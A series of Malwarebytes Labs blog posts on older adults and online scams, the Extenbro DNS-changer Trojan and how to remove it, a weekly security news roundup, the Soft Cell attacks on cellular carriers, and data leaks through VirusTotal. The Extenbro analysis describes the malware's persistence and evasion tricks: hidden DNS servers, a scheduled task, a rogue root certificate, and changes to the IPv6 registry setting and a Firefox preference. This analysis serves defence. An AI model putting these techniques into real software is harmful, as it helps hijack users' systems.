Yes, privacy and security are important concerns for most technology users, but Linkage Connect explained that when it comes to the elderly, “the biggest barriers that keep them from adopting new technology today are the complexity, understanding it all, the cost, and having no easy way to learn it.”

Scammers target older users

Verizon’s 2019 Data Breach Investigations Report found that 32 percent of data breaches involved phishing, where cybercriminals send emails pretending to be from reputable companies to coax people into revealing personal information, such as passwords and credit card numbers. Not surprisingly, young people are concerned that their aging parents could easily fall victim to a phish or some other type of fraudulent scam, especially because scammers are keen to target older users, whom they believe to be more vulnerable.

When asked about her perceived ability to detect fraud and scams, Poggi’s mom said, “I think there are obvious ones, like the email ones or those images that promise to make you a millionaire. Aside from that, I don’t really know what other types of scams are out there. It worries me that I don’t know what to look out for. I know how to keep my social media private, but I don’t really know who is looking at what or where.”

Poggi agrees with his mother’s assessment, but worries that the areas where she lacks awareness could lead to compromise.

“I don’t think their generation adopted technology in the way we have,” said Poggi. “They are way behind with best practices. Basic things like password hygiene, phishing, fake websites, fake offers, still get to them. Still, they seem to have adopted enough technology to make for an awfully dangerous combination: a lack of security plus online banking plus social media.”

I love my phone! I hate my phone!

Older generations are increasingly becoming major consumers of connected devices. In fact, 94 percent of Americans over the age of 50 use technology to stay connected with their friends and family members, according to the 2019 Tech and the 50+ Survey published by AARP.

Yet, many in the 50+ age group have a love-hate relationship with technology. The Linkage Connect survey covered a wide swath of participant ages—nearly half a century, actually. Some said they had no use for technology. Others said they couldn’t imagine life without it. Most respondents appreciated being able to use technology but found the learning curve frustrating.

“Finding time to learn to use and to fix technology is the biggest problem,” said one woman in the 75–79 age range.

A woman nearly 10 years her senior said, “I find it frustrating when setting up a new electronic device such as a printer, computer, phone, etc. Instructions are supposed to be simple, but there always seems to be something missed. Need a person to walk me through it.”

While others noted their reliance on family to help them navigate the complexities of their connected devices, one woman in her sixties said, “I find it interesting, but the advancements come so rapidly, it is hard to keep up. And the expense is ridiculous.”

Though technology admittedly makes some aspects of life simpler, another 75–79 year old woman said, “At times, I feel that if I have to learn one more thing I will scream, but it is keeping me current with the world.”

Convenience, affordability, and simplicity

According to AARP, technologies targeting “the health, wellness, safety, and vitality of adults 50-plus are proliferating.” Technology innovators obviously crunched the numbers from the Census Bureau in preparation for January’s CES 2019 in Las Vegas, where many of the devices introduced for older generations ranged from awesome to odd.

As people age, however, they want to make things simpler. Simplicity and ease of use should be the goal of technologies and devices that are designed for older generations. The Linkage Connect study noted that “With the 50+ population representing approximately 115 million in the United States alone today and the expectation for that number to reach 132 million by 2030 (from the US Census Bureau), it is now more important than ever to understand the older adult consumer.”

No one wants to fumble through learning how to use a connected device. If it’s too challenging, it’s useless. Asking for help can be embarrassing for older generations who have to turn to their children or grandchildren to learn how to use a new gadget, which is one reason why the American Society on Aging advised, “It is imperative that in addition to making technology more intuitive for older adults, training older adults in how to use technology must be a national priority.”

What’s important to remember is that education needs to be accessible and personal—at any age. In order to enable adoption that improves the lives of elders, manufacturers and younger helpers need to meet them where they are.

“They want to learn ‘hands on’ with others. Teaching older adults how to use these devices, in the manner in which they want to learn, could prove to benefit them as they age,” the Linkage Connect study said.

Older adults who feel overwhelmed should feel free to take the initiative to ask for help. And younger family members or friends should be patient and take a beat to not only fix the problem, but walk people through it. In the end, both generations can benefit from the extra security awareness practice.

The post Hi, honey. It’s mom. My phone is acting funny again. appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Meet Extenbro, a new DNS-changer Trojan protecting adware

Malwarebytes - Mon, 07/15/2019 - 14:54

Recently, we uncovered a new DNS-changer called Extenbro that comes with an adware bundler. These DNS-changers block access to security-related sites, so the adware victims can’t download and install security software to get rid of the pests.

From our viewpoint, this might be like sending in an elephant to save the mosquito, but the threat actors behind this attack have been known to use aggressive tactics in the past. What do they care if they open up your machine to all kinds of threats by disallowing you access to security sites and blocking any existing security software from getting updates? They just want to serve you adware.

Unfortunately, we have seen this kind of behavior before. But since this one uses a few fancy tricks, we’ll give you a quick overview of what it does and how you can get rid of it. For those just looking for a quick fix, there is a removal guide on our forums.

Infection vector

We have noticed the Extenbro Trojan is delivered on systems by a bundler that is detected by Malwarebytes as Trojan.IStartSurf.


First and foremost, the Trojan changes the DNS settings of the infected system so it won’t be able to reach any security vendors’ sites.

New for this one is that the Trojan adds four DNS servers rather than the usual two, and only two of them are visible in the main settings. People might be inclined to change just the two that are visible, which would leave the additional two behind; you have to click the Advanced button and open the DNS tab to find the other two.

Task Scheduler

Should you manage to correct the offending DNS servers and reboot the system before taking further measures, you will find that the DNS settings re-appear after a reboot. This is because of a randomly-named Scheduled Task that looks similar to this:

The location of the folder and the switches for the command seem to be fixed, but the folder name and file name are random.

Root certificate

The Trojan also adds a certificate to the set of Windows Root certificates.

Using the method outlined in the blog post Learning PowerShell: some basic commands, I established that the certificate has no “Friendly Name” and is supposedly registered to abose[at]reddit[dot]com.

Disables IPV6

By changing the registry value DisabledComponents under the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters and setting the value to “FF”, the Trojan disables IPv6 to force the system to use the new DNS servers.


The malware also makes a change in the Firefox user.js file and sets the security.enterprise_roots.enabled setting to true, which configures Firefox to use the Windows Certificate Store, where the newly-added root certificate resides.
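For reference, the relevant entry in user.js looks like a standard Firefox preference line. The exact line the Trojan writes may differ slightly; this is the documented syntax for that preference, with our own comment added:

```js
// In the Firefox profile's user.js: makes Firefox also trust certificates
// from the Windows Certificate Store (the default value is false).
user_pref("security.enterprise_roots.enabled", true);
```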

Removal instructions

Some of the changes that this malware makes could already be in place, if they are the user’s preferred settings. So feel free to skip the steps that you are not comfortable with.

What really needs to be done so you can download a removal tool or update your existing security software is to restore the DNS servers to what they were—or, if you don’t know the previous settings, to something safe. Most ISPs have the preferred DNS servers listed in their installation instructions or on their website. That is the first place to look. If you can’t find them there, you can use the DNS servers provided by OpenDNS. You can find instructions for many operating systems on their site.

An extra step needs to be taken when you are in this screen:

Make sure to click on Advanced… and select the DNS tab to find the extra two DNS servers that we mentioned earlier. Remove those before you change the two shown on the screen to your preferred ones.

Now, you should be able to visit security sites again. Follow the remaining instructions below:

  • To get to your security sites, you may need a restart of the browser. Do NOT reboot your system, or the DNS servers might be changed for the worse again by the Scheduled Task that belongs to the Trojan. If your existing solution does not pick up on the malware, download Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that All Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • This procedure should take care of the Scheduled Task and the Root certificate.
  • If you want to undo the change that makes Firefox adhere to the Windows certificates, you can open Firefox and type about:config in the address bar. Then read and accept the “risk” and search for security.enterprise_roots.enabled. The default setting is false. You can change the setting by selecting the line and right-clicking it to get a menu. Clicking Toggle changes the value back and forth between True and False. Close the about:config tab when you are done.

Should you need further help, feel free to reach out to us on the forums or by contacting our support department.


DNS servers:


SHA256 b2a28e9abb04a5926d53850623b1f3c6738169b27847e90c55119f2836c17006

Root certificate:


Stay safe, everyone!

The post Meet Extenbro, a new DNS-changer Trojan protecting adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 8 – 14)

Malwarebytes - Mon, 07/15/2019 - 14:27

Last week on Malwarebytes Labs, we looked at ways to send your sensitive information in a secure fashion, examined some tactics in incident response land, and explored federal data privacy law. We also looked at how security tools can turn against you, and took a deep dive into the rather fiendish Soft Cell attack.

Other cybersecurity news
  • The UK government backs facial recognition tech: The controversial trials received the backing of the British government’s home secretary. (Source: BBC)
  • Who watches the Watchmen: British police officer misuses database. (Source: The Register)
  • Zoom zero-day lurches into view: Researchers report a bug which leaves Mac users susceptible to webcam hijacks. (Source: ThreatPost)
  • Listen closely: Google contractors can listen to Google Home audio clips. (Source: Sophos’s Naked Security Blog)
  • Agent Smith on the prowl: Android malware capable of replacing code with its own malicious wares found on more than 25 million devices. (Source: The Verge)
  • TrickBot is what’s hot: The timeless “classic” returns with a few new tricks up its sleeve, including some cunning spam antics. (Source: TechCrunch)
  • Pale Moon rising: Old versions of the popular browser found to be infected with malware. (Source: ZDNet)
  • Phish attacks are never far: A recent study revealed that one in 99 emails are classified as phishing. Here’s a good look at costs and some additional statistics. (Source: Small Business Trends)
  • Beware of whales: Ship operators are warned by the US Coast Guard to be on the lookout for targeted spear phishing attempts. (Source: Computing News)
  • Amazon is a Prime target: Beware of smart phishing scams looking to bait those looking for a bargain on Prime Day. (Source: Wired)

Stay safe, everyone!

The post A week in security (July 8 – 14) appeared first on Malwarebytes Labs.


Cellular networks under fire from Soft Cell attacks

Malwarebytes - Fri, 07/12/2019 - 15:30

We place a lot of trust in our mobile devices, given they’re among the most constant companions we have. Huge reams of data, tied to a device we always carry with us, with said device frequently offering additional built-in app functionality. An astonishing wealth of information for anyone bold enough to try and take it.

Security firm Cybereason uncovered an astonishing attack dubbed “Operation Soft Cell,” haunting at least 10 cellular networks around the globe. Over the course of seven years, the attackers went after all manner of detailed information on just 20 to 30 targets, feeding it back to base and building up an amazingly detailed picture of their daily dealings.

What happened here?

The researchers assess with high probability that this was a nation-state attack, and the attackers went to elaborate lengths to nab their high-value targets. They first gained a foothold by targeting a web-connected server and using an exploit to gain access. A web shell would then be placed to enable further unauthorised activity.

In this particular case, a modified version of the well-known China Chopper web shell was deployed to carry out specific tasks. It’s quite flexible, able to run on multiple server platforms. It’s also quite old, dating back several years. I guess there are no tunes quite like the classics.

Thanks to China Chopper and a variety of alternative compromise tools, the attackers would make use of credentials from the first machine to dig deeper in the network. Well-worn RATs like PoisonIvy were used to ensure continued access on compromised devices.

Eventually, they’d gain control of the Domain Controller, and at that point, it’s essentially game over for the targeted organisation.

Groundhog Day

It appears the criminals reused the same techniques to work their way around the various cellular networks, with little resistance. Talk about “If it ain’t broke, don’t fix it.” So total was their ownership of certain organisations, they were able to set up VPN services to enable quick, persistent access on hijacked networks instead of taking the much slower route of connecting their way through multiple compromised servers.

If they were worried about being caught in the act, they certainly didn’t show it. In fact, from reading the main report it seems in cases where there was some pushback, they simply looped back around and tried again till they succeeded, attacking in waves staggered over a period of months.

The Crown Jewels

Most of the time, attacks on web-facing servers result in an email from Have I Been Pwned, after which you see which bits of personal information have been fired across the web this time. Not here, however—it was never going to end with a username/password dump.

The attackers who plundered these cellular networks gained access to pretty much everything you could think of. In cases where the target was fully compromised, all usernames and passwords were grabbed, along with billing information and various smatterings of personal data.

However, the big prize here wasn’t being able to hurl all of this onto a Pastebin or upload it to social media as a free-for-all; nothing so bland. It was, instead, being able to sit quietly on this data alongside hundreds of gigabytes of call detail records. This is, as you’ll see, a bad thing.

Call detail records: What are they?

Good question.

Call detail records are all about metadata. They won’t give you the contents of the call itself, but what they will give you is pretty much everything else. They’re useful for a variety of things: billing disputes, law enforcement inquiries, tracking people down, bill generation, call volumes/handling for businesses and much more. Not only do they avoid recordings of conversations, they also steer clear of specific location information.

Nonetheless, patterns of behaviour are easy to figure out. A typical CDR could include:

  • Caller
  • Recipient
  • Start/end time of call
  • Billing number
  • Voice/SMS/other
  • A specific number used to identify the record in question
  • How the call entered/exited the exchange
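To see how much a pattern of life falls out of metadata alone, here is a minimal sketch using fields like those above; the records and names are invented for illustration:

```python
# Sketch: behaviour analysis from CDR metadata only -- no call content needed.
from collections import Counter
from dataclasses import dataclass

@dataclass
class CallDetailRecord:
    caller: str
    recipient: str
    start: str          # ISO timestamp
    duration_secs: int
    kind: str           # "voice", "sms", ...

def top_contacts(records, caller, n=3):
    """Most frequent recipients for one caller -- a pattern of life."""
    counts = Counter(r.recipient for r in records if r.caller == caller)
    return counts.most_common(n)

records = [
    CallDetailRecord("alice", "bob",   "2019-07-01T09:00", 120, "voice"),
    CallDetailRecord("alice", "bob",   "2019-07-02T09:05",  90, "voice"),
    CallDetailRecord("alice", "carol", "2019-07-02T21:40",  30, "sms"),
]
print(top_contacts(records, "alice"))  # -> [('bob', 2), ('carol', 1)]
```

A few lines of aggregation already reveal who someone talks to most and when; scale that to years of records and the appeal to an attacker is obvious.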

If you’re looking to target specific individuals, then this data over time is an incredible resource for an attacker to get hold of. Some may prefer the old spear phish/malware attachment type scenario, but by going after the target directly, it’s quite possible someone’s going to find out. Where targets are high value, they’ll almost certainly have additional security measures in place. For example, journalists who cover human rights abuses in dangerous parts of the world will often work with organisations who keep an eye out for potential attacks.

This method, aimed at slowly digging around behind the scenes and out of view from whoever happens to be using those networks, is much sneakier. Depending on how things pan out, it’s entirely possible they’d never even know they’d been compromised by proxy in the first place.

Hidden in plain sight

With methods such as this, the people behind the malware daisy chain have an amazing slice of access to the individual with no direct specific risk. Everything at that point comes down to how well the cellular network is locked down, how good their security is, how on the ball their incident response team happens to be, and so on.

If (say) they failed to spot numerous attacks, left vulnerable servers online, missed telltale signs that something is amiss, let well-known RATs like PoisonIvy dance across their network, allowed the hackers to set up a bunch of VPN nodes…well, you can see where I’m going with this.

Where I’m going is several years later and a large slice of “Oh dear.”


Well, first things first: don’t panic. It’s worth noting there isn’t any additional verification (yet) outside the initial threat report. Something bad has clearly happened here, but as to how severe it is, we’ll leave that to others to debate.

Whether this was pulled off by a high-level, nation-state-approved group of attackers or a random collection of bored people in an apartment, one way or another those cell networks really had a number done on them. The impact on the individuals caught up in this is the same, and one assumes they’ve been informed and taken appropriate action. We can only hope the cellular networks affected have now taken appropriate measures and shored up their defences.

The post Cellular networks under fire from Soft Cell attacks appeared first on Malwarebytes Labs.


Caution: Misuse of security tools can turn against you

Malwarebytes - Thu, 07/11/2019 - 17:34

We have a saying in Greece: “They assigned the wolf to watch over the sheep.”

In a security context, this is a word of caution about making sure the tools we use to keep our information private don’t actually cause the data leaks themselves. In this article, I will be talking about some cases that I have come across in which security tools have leaked data they were intended to secure.

The VirusTotal problem

VirusTotal (VT) is a multi-scanner to which any individual researcher is free to upload a file they believe is suspicious. They can then view results from many antivirus (AV) products as to whether or not the file is considered malware. While this is an amazing service, which I am certain everyone in the infosec world uses regularly, its usage needs to be thought through carefully.

What some people don’t realize is that every file you submit to VirusTotal gets saved on VT’s servers and is fully searchable. Using a VT tool called Malware RetroHunting, malware hunters have the ability to search for text and binary patterns in order to find malware similar to samples they may be analyzing or tracking.

This is a great feature, but as you can imagine, just as someone could search for [insert malicious string of your choice], they could just as easily search for “Account Number:”, which might result in loads of documents containing such data. It is important to bring awareness to this fact so that people can properly use this tool without risking their private data.
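As a hedge before submitting anything, a simple pre-upload check for private-data markers can help. This sketch uses a few illustrative patterns (“Account Number:” among them) and is nowhere near exhaustive:

```python
# Sketch: check a document's text for sensitive markers before submitting
# it to any public scanner. The patterns are illustrative, not exhaustive.
import re

SENSITIVE_PATTERNS = [
    re.compile(r"Account Number:", re.IGNORECASE),
    re.compile(r"\bSSN\b", re.IGNORECASE),
    re.compile(r"password\s*[:=]", re.IGNORECASE),
]

def looks_sensitive(text: str) -> bool:
    """True if the text matches any pattern suggesting private data."""
    return any(p.search(text) for p in SENSITIVE_PATTERNS)

assert looks_sensitive("Dear customer, your Account Number: 12345 ...")
assert not looks_sensitive("Quarterly newsletter, nothing private here.")
```

A check like this only catches the obvious cases, but it is far better than uploading blindly.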

I will go through a few cases showing the misuse of VirusTotal, to serve as a warning for users who might be thinking about using second-rate or unofficial tools, or adopting practices built on top of VT.

Case 1: The no AV argument

I far too often hear people saying something like this: “I don’t need an antivirus. I send files to VT for free when they look suspicious.”

I think it should be quite obvious why this method is flawed. If you submit all documents you receive to VT, then you run the risk of leaking private information, as stated above. And if you exclude documents from specific “trusted” addresses from scanning (in order not to leak confidential data), then you run the risk of having malware phished to you from a spoofed contact. Needless to say, this is not a safe way to keep yourself protected.

Case 2: API usage

The use of the VirusTotal API can also be dangerous. Bugs in code or logic can easily cause a mass upload of private files. This is a danger whether you are building your own tools or using tools like WINJA, which automate the submission of files to VT. The only recommendation here is to make sure the tools you are using are reputable, or to do your own independent code audit to make sure no bugs can lead to data leakage.

When it comes to using other reputable security tools, it is wise to read over all of the documentation and make sure you understand how and when the given tool will incorporate VT.
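One way to lower the risk in API automation is to query by hash first and upload file content only as a deliberate, reviewed step. The sketch below only computes the SHA-256 and builds the lookup URL (the files endpoint shown is from VirusTotal’s public v3 API; the network call itself is omitted):

```python
# Sketch: look files up by hash instead of uploading content. Querying
# VirusTotal for a SHA-256 (GET /api/v3/files/{hash} in the v3 API)
# reveals nothing about a file VT has never seen, whereas an upload
# publishes the whole file for anyone to search.
import hashlib

def sha256_of(data: bytes) -> str:
    """Hex SHA-256 digest of a file's contents."""
    return hashlib.sha256(data).hexdigest()

def lookup_url(data: bytes) -> str:
    """URL to query a hash without ever transmitting the file body."""
    return f"https://www.virustotal.com/api/v3/files/{sha256_of(data)}"

print(lookup_url(b"example file contents"))
```

If the hash is unknown to VT, that is the moment for a human decision about whether the file is safe to publish, rather than letting automation decide.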

Case 3: VT email scanning service

I have unfortunately seen many articles and forum posts online where people give advice to use the VT attachment scanning service. Basically, by forwarding an email attachment to VT’s scanning address, the sender receives a response describing what VT found regarding the attachment.

Please do not take such advice unless you are sure the document you are scanning contains no private data. It is a risky game. If you are worried about malicious documents infecting your computer, then the logical conclusion would be to buy an antivirus with a good reputation and the technology to block malicious documents.

If you choose to send all your potentially private emails to VT, searchable by anyone, then you’re essentially undoing any potential security or privacy benefits by exposing all your data anyway. What damage is spyware going to do when you’ve already sent your sensitive data out to a public database?

EXE files problem

The next case I want to talk about, while less sensitive, is a lot more likely to be overlooked.

In a corporate environment, we cannot rely on everyone to manually submit attachments or files to security engineers—all of this is automated. From my past experience and from speaking with fellow security engineers, I have seen that it is quite common for all executables entering a corporate network to automatically get scanned with various plugins tied to a given platform. I will highlight Carbon Black, an enterprise endpoint security platform, in this case, although many other security providers have this problem as well.

When a new exe makes its way into a network, Carbon Black stores it, but it also has the ability to cross-reference the given file with various plugins and tools that are built into or added to the platform. For example, you can click a bubble on any given file in your network, which will give you its results against the WildFire sandbox. And of course, the topic that has received so much heat in the media this year—the VT plugin.

Now, while they have fixed the issues on submitting documents to avoid leaking data, they still do submit exes. But wait, so what? Isn’t that exactly what we want it to do?

Correct, it is. Automation is what every corporation aims for in its security infrastructure. There is nothing wrong with the root idea of submitting and scanning exes flowing through the network. However, automation sometimes comes with a tradeoff if not properly planned.

I have evaluated the security infrastructure of many corporate networks, and in these evaluations I have seen that, in this attempt to scan all new exes for malware, the company’s in-house executables end up getting scanned as well.

So now, confidential exes are unknowingly being exposed, leaking arguably more sensitive data and intellectual property. In addition, think for a moment about how software developers typically code. While testing functionality, it is common for a developer to hard-code credentials, paths, or other revealing information into a test build. Sure, after they are done, the production build will likely be changed to hide this information and make it dynamic, but in the meantime, these demo builds have been picked up by the EDR and scanned through various plugins.
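One lightweight mitigation is to scan build artifacts for credential-looking strings before they ever reach shared infrastructure. The marker patterns and sample blobs below are purely illustrative:

```python
# Sketch: a pre-release check for hardcoded credentials in build output,
# so demo builds are caught before any automated scanner sees them.
# The marker strings are illustrative; real checks would be broader.
import re

SECRET_MARKERS = re.compile(
    rb"(password|passwd|api[_-]?key|secret)\s*[:=]", re.IGNORECASE
)

def find_secret_markers(binary: bytes):
    """Offsets of credential-looking markers inside a binary blob."""
    return [m.start() for m in SECRET_MARKERS.finditer(binary)]

demo_build = b"\x7fELF...debug...api_key=TESTKEY123...\x00"
assert find_secret_markers(demo_build)          # demo build gets flagged
assert not find_secret_markers(b"\x7fELF...release build...\x00")
```

Wiring a check like this into the build pipeline costs little and catches the exact hard-coded-credential scenario described above.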

Again, this is not a problem with the EDR itself; it is a problem with its implementation, which is entirely the responsibility of the customer using the software.

Remediation and prevention

Now, this does not mean we need to abandon the use of security tools for fear of data leaks; it simply means we need to make some adjustments. So what can a business do to protect against leaking its own data to the public?

There are many options which will depend upon the compliance requirements and needs of a given company, but I have a few base considerations I recommend.

Rules-based segmentation

Rather than having a blanket automation where everything is automatically scanned, I always recommend segmenting the actions taken when the EDR sees a new file based on user groups. For example, maybe users in the developers’ group do not have their binaries residing in a specific directory sent for auto scanning.

However, this is easier said than done, because simply enabling this type of rule can be catastrophic: it may essentially give a developer free rein to secretly develop malware. That’s why, when one security rule is relaxed for a given user, another must be tightened to make up for it. So in this theoretical scenario, we have just given a developer a free pass to not have his executables scanned. We have closed one door but opened another.

To make up for this, one approach is to keep a heavy watch on the IPs and ports that the dev machines are allowed to communicate over. If a developer needs to communicate with a specific IP for his software, he should get approval in advance from the security engineers. At this point, we can let the developer go ahead and create malware, but if his machine’s MAC address or IP is seen attempting communication with a non-pre-approved IP or over a non-pre-approved port, fire alerts. This type of rule is trivial to create with a good EDR platform.
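The rule just described can be sketched in a few lines; the approvals table, hostnames, and addresses are all invented for illustration:

```python
# Sketch of the alert rule: each dev machine gets a pre-approved set of
# (destination IP, port) pairs, and any other connection raises an alert.

APPROVED = {
    "dev-box-01": {("203.0.113.10", 443), ("203.0.113.10", 22)},
}

def should_alert(machine: str, dest_ip: str, port: int) -> bool:
    """True if this connection was not pre-approved for the machine."""
    return (dest_ip, port) not in APPROVED.get(machine, set())

assert not should_alert("dev-box-01", "203.0.113.10", 443)  # approved
assert should_alert("dev-box-01", "198.51.100.5", 443)      # fire alert
assert should_alert("unknown-host", "203.0.113.10", 443)    # default deny
```

Note the default-deny behaviour for machines with no approvals on file; that choice is what keeps the relaxed scanning rule from becoming a blind spot.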

The roles and expected behavior of a given employee’s machine must be fully understood beforehand to be able to keep proper control over a network.

Understand the tools you use

It is important to understand that security tools are made for generic use. The creators do not know specifically what your company does and what your privacy policies are. They do not know whether you will be developing your own software onsite or whether you are simply using the tool to scan downloaded files.

That being said, it is up to you, the user or security engineer in charge of evaluating, to make sure you understand all of the functionality and options a tool gives you.

A developer who creates a tool to scan email attachments automatically with VT is not necessarily acting maliciously. For some users, perhaps one who specifically does not create or store information in documents, this might be the best tool in the world, exactly what they need to automate their operations. For another company, which sends its contracts as Word documents, it might be catastrophic. At the end of the day, the blame cannot be placed on a tool that behaved exactly as advertised. It’s up to the user to do her own research and understand what the tool does and how it will affect privacy and security.

The post Caution: Misuse of security tools can turn against you appeared first on Malwarebytes Labs.


